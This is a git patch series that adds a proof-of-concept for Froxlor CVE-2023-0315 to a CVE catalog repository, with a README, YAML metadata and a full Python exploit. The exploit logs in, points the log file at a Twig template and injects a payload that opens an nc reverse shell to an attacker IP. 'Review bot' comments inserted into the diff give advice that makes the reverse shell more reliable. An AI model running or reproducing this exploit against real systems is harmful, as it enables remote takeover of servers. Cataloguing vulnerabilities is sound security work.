From a6c33b45d5fd8ceca989584035d7d2ab91ad95ad Mon Sep 17 00:00:00 2001
From: 2045
Date: Mon, 3 Apr 2023 13:20:26 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0315?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Froxlor/2023/CVE-2023-0315/README.md | 28 ++++
 .../2023/CVE-2023-0315/cve-2023-0315.py | 135 ++++++++++++++++++
 cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 21 +++
 openkylin_list.yaml | 2 +
 4 files changed, 186 insertions(+)
 create mode 100644 cve/Froxlor/2023/CVE-2023-0315/README.md
 create mode 100644 cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
 create mode 100644 cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
diff --git a/cve/Froxlor/2023/CVE-2023-0315/README.md b/cve/Froxlor/2023/CVE-2023-0315/README.md
new file mode 100644
index 00000000..d0fe71ba
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/README.md
@@ -0,0 +1,28 @@
+# CVE-2023-0315 Proof-of-Concept
+### Overview
+This is a Remote Code Execution Proof-of-Concept for Froxlor 2.0.3 Stable Vulnerability CVE-2023-0315.
+It exploits a command injection vulnerability in Froxlor prior to version 2.0.8.
+An authenticated attacker can achieve a full remote command execution on OS level under the web server user.
+For a comprehensive understanding, check out the accompanying [blog post](https://huntr.dev/bounties/ff4e177b-ba48-4913-bbfa-ab8ce0db5943) for in-depth details.
+
+### Dependencies
+* Froxlor 2.0.3 Stable
+* Python 3.8+
+* `requests` Python Library
+* `beautifulsoup4` Python Library
+* Ubuntu 20.04
+* PHP 8.2
+### Usage
+
+1.Verify the required libraries are installed:
+```
+pip install requests beautifulsoup4
+```
+2.Change the target URL, credentials, and any other required variables to match your vulnerable Froxlor instance.
+
+3.Run the PoC:
+```
+python cve-2023-0315.py
+```
+### Additional Information
+This PoC targets Froxlor 2.0.3 Stable and has been tested on Ubuntu 20.04 with PHP 8.2. The vulnerability was patched in Froxlor version 2.0.8. To protect against this vulnerability, it is recommended to update Froxlor to the latest version.
diff --git a/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
new file mode 100644
index 00000000..bb07041b
--- /dev/null
+++ b/cve/Froxlor/2023/CVE-2023-0315/cve-2023-0315.py
@@ -0,0 +1,135 @@
+#!/usr/bin/python3
+
+# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution
+# Date: 2023-01-08
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2023-0315
+# Vendor Homepage: https://froxlor.org/
+# Version: v2.0.3
+# Tested on: Ubuntu 20.04 / PHP 8.2
+
+import telnetlib
+import requests
+import socket
+import sys
+import warnings
+import random
+import string
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+from threading import Thread
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+
+if len(sys.argv) != 6:
+ print("[~] Usage : ./froxlor-rce.py url username password ip port")
+ exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+request = requests.session()
+
+def login():
+ login_info = {
+ "loginname": username,
+ "password": password,
+ "send": "send",
+ "dologin": ""
+ }
+ login_request = request.post(url+"/index.php", login_info, allow_redirects=False)
+ login_headers = login_request.headers
+ location_header = login_headers["Location"]
+ if location_header == "admin_index.php":
+ return True
+ else:
+ return False
+
+
+def change_log_path():
+ change_log_path_url = url + "/admin_settings.php?page=overview&part=logging"
+ csrf_token_req = request.get(change_log_path_url)
+ csrf_token_req_response = csrf_token_req.text
+ soup = BeautifulSoup(csrf_token_req_response, "lxml")
+ csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"])
+ print("[+] Main CSRF token retrieved %s" % csrf_token)
+
+ multipart_data = {
+
+ "logger_enabled": (None, "0"),
+ "logger_enabled": (None, "1"),
+ "logger_severity": (None, "2"),
+ "logger_logtypes[]": (None, "file"),
+ "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"),
+ "logger_log_cron": (None, "0"),
+ "csrf_token": (None, csrf_token),
+ "page": (None, "overview"),
+ "action": (None, ""),
+ "send": (None, "send")
+
+ }
+ req = request.post(change_log_path_url, files=multipart_data)
+ response = req.text
+ if "The settings have been successfully saved." in response:
+ print("[+] Changed log file path!")
+ return True
+ else:
+ return False
+
+
+def inject_template():
+ admin_page_path = url + "/admin_index.php"
+ csrf_token_req = request.get(admin_page_path)
+ csrf_token_req_response = csrf_token_req.text
+ soup = BeautifulSoup(csrf_token_req_response, "lxml")
+ csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"])
+ onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port)
+ payload = "{{['%s']|filter('exec')}}" % onliner
+ data = {
+ "theme": payload,
+ "csrf_token": csrf_token,
+ "page": "change_theme",
+ "send": "send",
+ "dosave": "",
+ }
+ req = request.post(admin_page_path, data, allow_redirects=False)
+ try:
+ location_header = req.headers["Location"]
+ if location_header == "admin_index.php":
+ print("[+] Injected the payload sucessfully!")
+ except:
+ print("[-] Can't Inject payload :/")
+ exit()
+ handler_thread = Thread(target=connection_handler, args=(port,))
+ handler_thread.start()
+ print("[+] Triggering the payload ...")
+ req2 = request.get(admin_page_path)
+
+
+def connection_handler(port):
+ print("[+] Listener started on port %s" % port)
+ t = telnetlib.Telnet()
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", int(port)))
+ s.listen(1)
+ conn, addr = s.accept()
+ print("[+] Connection received from %s" % addr[0])
+ t.sock = conn
+ print("[+] Heads up, incoming shell!!")
+ t.interact()
+
+
+
+if login():
+ print("[+] Successfully Logged in!")
+ index_url = url + "/admin_index.php"
+ request.get(index_url)
+ if change_log_path():
+ inject_template()
+
+else:
+ print("[-] Can't login")
\ No newline at end of file
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
new file mode 100644
index 00000000..e6c84988
--- /dev/null
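Review bot: The reverse-shell listener is bound and put into listen state inside `connection_handler`, but `inject_template` starts that thread and immediately fires the trigger `request.get(admin_page_path)`, so nothing guarantees the socket is listening when the target's `nc` connects back and the callback may be refused on a fast target. Create, bind and listen on the socket in `inject_template` before the trigger request and pass the ready socket to the handler, as sketched below; `SO_REUSEADDR` also lets a rerun reuse the port after a failed attempt. `login()` indexes `login_request.headers["Location"]` unconditionally, so a failed login that answers 200 dies with KeyError instead of reaching `print("[-] Can't login")` — `location_header = login_headers.get("Location")` keeps the existing comparison intact. Worth a line in the file header: `telnetlib` is deprecated and removed in Python 3.13 (the README advertises 3.8+), the path `/var/www/html/froxlor/templates/Froxlor/footer.html.twig` assumes a particular install location, and `change_log_path` leaves the target's logger pointed at that template with no restore step, so the PoC is destructive to the instance's settings.
```python
def inject_template():
    # … unchanged: CSRF token fetch, payload build and theme POST …
    # Listen *before* triggering so the callback cannot race the bind().
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("0.0.0.0", int(port)))
    listener.listen(1)
    print("[+] Listener started on port %s" % port)
    handler_thread = Thread(target=connection_handler, args=(listener,))
    handler_thread.start()
    print("[+] Triggering the payload ...")
    req2 = request.get(admin_page_path)


def connection_handler(listener):
    # Socket is already bound and listening; only accept() happens here.
    conn, addr = listener.accept()
    print("[+] Connection received from %s" % addr[0])
    t = telnetlib.Telnet()
    t.sock = conn
    print("[+] Heads up, incoming shell!!")
    t.interact()
```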
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-0315
+source:
+ https://github.com/mhaskar/CVE-2023-0315
+info:
+ name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
+ severity: high
+ description: |
+ Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
+ scope-of-influence:
+ Froxlor 2.0.8 之前的版本
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
+ - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0315
+ cwe-id: CWE-77
+ cnvd-id: None
+ kve-id: None
+ tags: 远程代码执行,RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index fe6ea472..f3d3f72d 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -155,6 +155,8 @@ cve:
 - CVE-2022-27925
 Grafana:
 - CVE-2021-43798
+ Froxlor:
+ - CVE-2023-0315
 cnvd:
 apache-tomcat:
 - CNVD-2020-10487
-- Gitee
From c20298ab4772dee41eb90b20cca21c8a89b36c96 Mon Sep 17 00:00:00 2001
From: 2045
Date: Mon, 3 Apr 2023 19:42:35 +0800
Subject: [PATCH 2/2] =?UTF-8?q?=E4=BF=AE=E6=AD=A3CVE-2023-0315.yaml?= =?UTF-8?q?=E4=B8=AD=E7=9A=84=E4=B8=80=E4=B8=AA=E6=A0=BC=E5=BC=8F=E9=97=AE?= =?UTF-8?q?=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
index e6c84988..5823536a 100644
--- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml
@@ -18,4 +18,4 @@ info:
 cwe-id: CWE-77
 cnvd-id: None
 kve-id: None
- tags: 远程代码执行,RCE
+ tags: 远程代码执行, RCE
-- Gitee
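Review bot: The `description` block in the new CVE-2023-0315.yaml states the flaw is exploitable 未经身份验证 (without authentication), which contradicts the `cvss-metrics` vector a few lines below (`PR:L`, privileges required), the README's "An authenticated attacker", and the PoC itself, whose `login()` must be redirected to `admin_index.php` before it touches the logger settings. Anyone triaging from this catalog would over-rate the exposure, so the line should read `Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。经过身份验证的攻击者可以利用这个漏洞在OS级别执行任意代码。` Separately, `name:` currently holds a product blurb rather than a vulnerability title; if the schema intends the latter, something like `Froxlor 2.0.8 之前版本命令注入导致远程代码执行` fits better and the product blurb can move into `description`. The follow-up patch only adjusts whitespace in `tags` and leaves both points untouched.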